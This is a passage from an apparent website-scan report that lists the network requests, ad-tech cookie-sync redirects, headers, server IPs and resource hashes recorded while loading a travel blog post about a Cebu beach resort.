&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 34.98.67.61 Kansas City, United States, ASN15169 (GOOGLE, US),
Reverse DNS: 61.67.98.34.bc.googleusercontent.com
Software: Apache /
Resource Hash: a065920df8cc4016d67c3a464be90099c9d28ffe7c9e6ee3a18f257efc58cbd7

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
via: 1.1 google
server: Apache
p3p: CP="NON DSP COR NID CURa PSAa PSDa OUR STP UNI COM NAV STA LOC OTC",policyref="/w3c/p3p.xml"
cache-control: no-cache, no-store, must-revalidate
content-type: image/gif;charset=UTF-8
alt-svc: clear
content-length: 43
x-application-context: application
expires: Thu, 01 Jan 1970 00:00:00 GMT

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 814D
Redirect Chain

https://rtb.openx.net/sync/dds?google_gid=CAESEKf_LiGQ906h9c7_DHMHDrk&google_cver=1&google_push=AQvitUK3E11YwuAsYD7FX1Em6vFNV6c9Unvzb4m8Vm6Bjy7vDIhEBnr6JxN_SZHpTnDQVpCdwzQNrEs4Y-qHuXlFjZ6ARtHkHIsX
https://rtb.openx.net/sync/dds?google_gid=CAESEKf_LiGQ906h9c7_DHMHDrk&google_cver=1&google_push=AQvitUK3E11YwuAsYD7FX1Em6vFNV6c9Unvzb4m8Vm6Bjy7vDIhEBnr6JxN_SZHpTnDQVpCdwzQNrEs4Y-qHuXlFjZ6ARtHkHIsX&...
https://cm.g.doubleclick.net/pixel?google_nid=open&google_push=AQvitUK3E11YwuAsYD7FX1Em6vFNV6c9Unvzb4m8Vm6Bjy7vDIhEBnr6JxN_SZHpTnDQVpCdwzQNrEs4Y-qHuXlFjZ6ARtHkHIsX&google_hm=jFhGaOJvwhcempX9hXIw-Q==

170 B
190 B

43ms
42ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=open&google_push=AQvitUK3E11YwuAsYD7FX1Em6vFNV6c9Unvzb4m8Vm6Bjy7vDIhEBnr6JxN_SZHpTnDQVpCdwzQNrEs4Y-qHuXlFjZ6ARtHkHIsX&google_hm=jFhGaOJvwhcempX9hXIw-Q==

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:06 GMT
via: 1.1 google
server: Cowboy
access-control-allow-origin: null
vary: Origin
p3p: CP="CUR ADM OUR NOR STA NID"
location: https://cm.g.doubleclick.net/pixel?google_nid=open&google_push=AQvitUK3E11YwuAsYD7FX1Em6vFNV6c9Unvzb4m8Vm6Bjy7vDIhEBnr6JxN_SZHpTnDQVpCdwzQNrEs4Y-qHuXlFjZ6ARtHkHIsX&google_hm=jFhGaOJvwhcempX9hXIw-Q==
access-control-expose-headers
cache-control: private, max-age=0, no-cache, must-revalidate
access-control-allow-credentials: true
alt-svc: clear
content-length: 0
x-request-id: hn6c9h8i88m7jgtcv8ee57qnmkms9gl4

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 814D
Redirect Chain

https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpmeb%26google_sc%3D1%26google_hm%3D%23%23B64_16B_PM_UID%26google_redir%3Dhttps%...
https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpmeb%26google_sc%3D1%26google_hm%3D%23%23B64_16B_PM_UID%26google_redir%3Dhttps%...
https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=9mjYBgwrQBeaD5-0TREzVw%3D%3D&google_redir=https%3A%2F%2Fimage8.pubmatic.com%2FAdServer%2FImgSync%3Fsec%3D1%26p%3D156578%26mp...

170 B
190 B

42ms
42ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=9mjYBgwrQBeaD5-0TREzVw%3D%3D&google_redir=https%3A%2F%2Fimage8.pubmatic.com%2FAdServer%2FImgSync%3Fsec%3D1%26p%3D156578%26mpc%3D4%26fp%3D1%26pu%3Dhttps%253A%252F%252Fimage4.pubmatic.com%252FAdServer%252FSPug%253Fp%253D156578%2526sc%253D1&google_push=AQvitUIMCthdV8CFqnblKB-tUpVM7obHvRGGuRShOOsa-6tcegbeOFnjsGowhOP60KDxZ3yHwYaYbBA-8DHVytpP1WfxMlZp_HvG

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

Location: https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=9mjYBgwrQBeaD5-0TREzVw%3D%3D&google_redir=https%3A%2F%2Fimage8.pubmatic.com%2FAdServer%2FImgSync%3Fsec%3D1%26p%3D156578%26mpc%3D4%26fp%3D1%26pu%3Dhttps%253A%252F%252Fimage4.pubmatic.com%252FAdServer%252FSPug%253Fp%253D156578%2526sc%253D1&google_push=AQvitUIMCthdV8CFqnblKB-tUpVM7obHvRGGuRShOOsa-6tcegbeOFnjsGowhOP60KDxZ3yHwYaYbBA-8DHVytpP1WfxMlZp_HvG
Date: Fri, 02 Apr 2021 03:11:05 GMT
P3p: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Length: 0
Content-Type: text/html; charset=UTF-8

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 814D
Redirect Chain

https://pixel.rubiconproject.com/exchange/sync.php?p=dfp&google_gid=CAESEKFi5nLfpda2yJmQQ8s7mKE&google_cver=1&google_push=AQvitUIVnMrD--Ve2DgNTzGPmLamD0s1pa1MT1XIB366RL9ckuX9bim-Yw6DIo7jdVzzlslhddY...
https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=S01aUUNMSk0tQy01SFZW&google_push=AQvitUIVnMrD--Ve2DgNTzGPmLamD0s1pa1MT1XIB366RL9ckuX9bim-Yw6DIo7jdVzzlslhddYs0Xr_-ETYbQ1XDK_VZhvAKDWZ

170 B
190 B

42ms
42ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=S01aUUNMSk0tQy01SFZW&google_push=AQvitUIVnMrD--Ve2DgNTzGPmLamD0s1pa1MT1XIB366RL9ckuX9bim-Yw6DIo7jdVzzlslhddYs0Xr_-ETYbQ1XDK_VZhvAKDWZ

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=S01aUUNMSk0tQy01SFZW&google_push=AQvitUIVnMrD--Ve2DgNTzGPmLamD0s1pa1MT1XIB366RL9ckuX9bim-Yw6DIo7jdVzzlslhddYs0Xr_-ETYbQ1XDK_VZhvAKDWZ
Cache-Control: no-cache,no-store,must-revalidate
Content-Type: text/html
content-length: 0
X-RPHost: 78e3bdce5107450057bade54d54a0a7e
Expires: 0

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 814D
Redirect Chain

https://ssum-sec.casalemedia.com/usermatchredir?s=184023&cb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dindex%26google_hm%3D&google_gid=CAESEO5KbdsaRHh9SqZenhnt_Lc&google_cver=1&googl...
https://ssum-sec.casalemedia.com/usermatchredir?cb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dindex%26google_hm%3D&google_cver=1&google_gid=CAESEO5KbdsaRHh9SqZenhnt_Lc&google_push=AQ...
https://cm.g.doubleclick.net/pixel?google_nid=index&google_hm=YGaLS8v3KqYvLxF0RhySFwAABzMAAAAB&google_cver=1&google_push=AQvitUI0xRGexIvprOKXUCZV-a6j9t3dEz54nvrj8cumfQ953Ji-HyrhFo0cHfueTUyaXI4VUmZl...

170 B
190 B

42ms
42ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=index&google_hm=YGaLS8v3KqYvLxF0RhySFwAABzMAAAAB&google_cver=1&google_push=AQvitUI0xRGexIvprOKXUCZV-a6j9t3dEz54nvrj8cumfQ953Ji-HyrhFo0cHfueTUyaXI4VUmZlmWKVTHQaCgFanpKSW2xpnXv8&google_gid=CAESEO5KbdsaRHh9SqZenhnt_Lc

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

Pragma: no-cache
Date: Fri, 02 Apr 2021 03:11:07 GMT
Server: Apache
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Location: https://cm.g.doubleclick.net/pixel?google_nid=index&google_hm=YGaLS8v3KqYvLxF0RhySFwAABzMAAAAB&google_cver=1&google_push=AQvitUI0xRGexIvprOKXUCZV-a6j9t3dEz54nvrj8cumfQ953Ji-HyrhFo0cHfueTUyaXI4VUmZlmWKVTHQaCgFanpKSW2xpnXv8&google_gid=CAESEO5KbdsaRHh9SqZenhnt_Lc
Cache-Control: max-age=0, no-cache, no-store
Connection: keep-alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 460
Expires: Fri, 02 Apr 2021 03:11:07 GMT

GET
H2 204 attr
cm.g.doubleclick.net/pixel/ Frame 814D 0
49 B 65ms
40ms Image
text/html 142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel/attr?d=AHNF13J4yEWnPzfIKuxi5v54cDHpgqZJ5DEok17NFAtcdoPUw8turo_oU0VKwCJaBcJpg4EcbySu

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0
content-type: text/html

GET
H2

200

render Show response
affiliate.klook.com/v3/affsrv/ads/ Frame 3E07
Redirect Chain

https://affiliate.klook.com/s/widgets/banner_v2?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&
https://affiliate.klook.com/v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6

3 KB
1 KB

195ms
195ms

Document
text/html

18.140.171.72
AMAZON-02

General

Check archive.org

Show headers Download Go to

Full URL: https://affiliate.klook.com/v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6
Requested by: Host: cdn.klook.com
URL: https://cdn.klook.com/affiliate_web/s/dist/desktop/affiliate_base_v3.js
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 18.140.171.72 Singapore, Singapore, ASN16509 (AMAZON-02, US),
Reverse DNS: ec2-18-140-171-72.ap-southeast-1.compute.amazonaws.com
Software: envoy /
Resource Hash: 180465c66c6a03e7b9ee869bdd704f8aa0bee88da0581cada31617b9dfc7d844

Request headers

:method: GET
:authority: affiliate.klook.com
:scheme: https
:path: /v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
cookie: kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

content-type: text/html; charset=UTF-8
vary: Accept-Encoding
date: Fri, 02 Apr 2021 03:11:07 GMT
server: envoy
x-envoy-upstream-service-time: 8
x-kong-upstream-latency: 9
x-kong-proxy-latency: 0
via: kong/2.1.4
content-encoding: gzip

Redirect headers

content-type: text/html; charset=utf-8
content-length: 353
server: envoy
date: Fri, 02 Apr 2021 03:11:07 GMT
set-cookie: kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6; path=/; expires=Sun, 02 Apr 2023 03:11:08 GMT; samesite=none; secure CSRF-TOKEN=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT; secure; httponly
location: /v3/affsrv/ads/render?prod=banner&w=250&h=250&lang=en&adid=28623&wid=3871&bgtype=Klook&kepler_id=86c61726-8434-4556-96c0-ead7b7526ea6
x-envoy-upstream-service-time: 322
x-kong-upstream-latency: 323
x-kong-proxy-latency: 0
via: kong/2.1.4

GET
H2 200 ChineseNewYear-3-squarestatic.jpg
cdn0.agoda.net/images/sherpa/bg/v2/ Frame C273 42 KB
42 KB 39ms
39ms Image
image/jpeg 104.111.235.205
AKAMAI-AS

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://cdn0.agoda.net/images/sherpa/bg/v2/ChineseNewYear-3-squarestatic.jpg
Requested by: Host: sherpa.agoda.com
URL: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
Protocol: H2
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 104.111.235.205 Frankfurt am Main, Germany, ASN16625 (AKAMAI-AS, US),
Reverse DNS: a104-111-235-205.deploy.static.akamaitechnologies.com
Software: nginx /
Resource Hash: f706fa967bea892a7f161b15827f6bc0a11154abc3b353e3a15abc742b2db178

Request headers

Referer: https://sherpa.agoda.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
last-modified: Fri, 11 Aug 2017 05:45:12 GMT
server: nginx
x-dc: ASH
etag: "0a4b5ff6412d31:0"
x-cache-status: HIT
content-type: image/jpeg
access-control-allow-origin: *
cache-control: max-age=1588290
accept-ranges: bytes
timing-allow-origin: *
content-length: 42755
expires: Tue, 20 Apr 2021 12:22:37 GMT

GET
H2 200 mallory-light-webfont-v01.woff2
cdn6.agoda.net/images/fonts/ Frame C273 51 KB
51 KB 97ms
31ms Font
application/font-woff2 104.111.235.205
AKAMAI-AS

General

Check archive.org

Show headers Download Go to

Full URL: https://cdn6.agoda.net/images/fonts/mallory-light-webfont-v01.woff2
Requested by: Host: sherpa.agoda.com
URL: https://sherpa.agoda.com/css/production/squarestatic_simple.min.css?v=CxuaZYXU2uNJGvRpBalRB5GniCEWkBrsCLdCOsJqwCs
Protocol: H2
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 104.111.235.205 Frankfurt am Main, Germany, ASN16625 (AKAMAI-AS, US),
Reverse DNS: a104-111-235-205.deploy.static.akamaitechnologies.com
Software: nginx /
Resource Hash: fb023437a64f3743a90c382f70c6726e3e3862ba00ffaf6e7e0bc3a65a33f0c8

Request headers

Origin: https://sherpa.agoda.com
Referer: https://sherpa.agoda.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
last-modified: Wed, 10 Aug 2016 04:41:58 GMT
server: nginx
x-dc: ASH
etag: "b1ed2887c1f2d11:0"
x-cache-status: HIT
content-type: application/font-woff2
access-control-allow-origin: *
cache-control: max-age=490147
accept-ranges: bytes
timing-allow-origin: *
content-length: 52321
expires: Wed, 07 Apr 2021 19:20:14 GMT

GET
H3-Q050 200 analytics.js Show response
www.google-analytics.com/ Frame C273 48 KB
19 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:802::200e
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google-analytics.com/analytics.js

Requested by

Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtag/js?id=UA-6446424-36

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:802::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

f79723478f4c48501cd49ac52b81d6244a6562b9d3f08ce8ab208a8b8878d4c4

Security Headers

Name	Value
Strict-Transport-Security	max-age=10886400; includeSubDomains; preload
X-Content-Type-Options	nosniff

Request headers

Referer: https://sherpa.agoda.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=10886400; includeSubDomains; preload
content-encoding: gzip
x-content-type-options: nosniff
last-modified: Fri, 19 Mar 2021 19:22:18 GMT
server: Golfe2
age: 3360
date: Fri, 02 Apr 2021 02:15:07 GMT
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=7200
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 19463
expires: Fri, 02 Apr 2021 04:15:07 GMT

GET
H3-Q050 200 300x600_Crypto3_CYSEC.html Show response
tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/ Frame E334 427 KB
67 KB 8ms
8ms Document
text/html 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/300x600_Crypto3_CYSEC.html

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

b9267642b9747b6f0d013968188c9b1f1625d9314722cee26b5127c14a4ea5a8

Security Headers

Name	Value
Content-Security-Policy	default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://.ggpht.com https://.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: tpc.googlesyndication.com
:scheme: https
:path: /sadbundle/$csp%3Der3$/1910213355410914744/300x600_Crypto3_CYSEC/300x600_Crypto3_CYSEC.html
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://googleads.g.doubleclick.net/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://googleads.g.doubleclick.net/

Response headers

accept-ranges: bytes
vary: Accept-Encoding
content-type: text/html
access-control-allow-origin: *
content-security-policy: default-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; script-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://s0.2mdn.net/ads/studio/cached_libs/ https://storage.googleapis.com/vr-assets-static/test_ads/GMAPlayable/ https://www.gstatic.com/ads/ci/ https://www.gstatic.com/swiffy/; object-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com; style-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com 'unsafe-eval' 'unsafe-inline' https://ajax.googleapis.com/ajax/ https://fonts.googleapis.com; img-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com blob: data: https://*.ggpht.com https://*.gstatic.cn https://*.gstatic.com https://ajax.googleapis.com/ajax/ https://lh3.googleusercontent.com https://lh4.googleusercontent.com https://lh5.googleusercontent.com https://lh6.googleusercontent.com https://s0.2mdn.net/ads/studio/cached_libs/ https://static.doubleclick.net https://vr.google.com/shaders/w/techspecs/; media-src 'none'; frame-src 'unsafe-inline' javascript:; font-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com data: https://fonts.gstatic.com; connect-src https://tpc.googlesyndication.com https://pagead2.googlesyndication.com https://csi.gstatic.com/csi https://fonts.googleapis.com/css https://fonts.googleapis.com/css2 https://vr.google.com/shaders/w/techspecs/; report-uri /pagead/gen_csp?id=adbundle; child-src 'unsafe-inline' javascript:; form-action 'none'
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
date: Wed, 31 Mar 2021 03:42:41 GMT
expires: Thu, 31 Mar 2022 03:42:41 GMT
last-modified: Tue, 30 Mar 2021 23:37:46 GMT
x-content-type-options: nosniff
x-dns-prefetch-control: off
content-encoding: gzip
server: sffe
x-xss-protection: 0
cache-control: public, max-age=31536000
content-length: 66669
age: 170906
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 7678 0
0 17ms
17ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

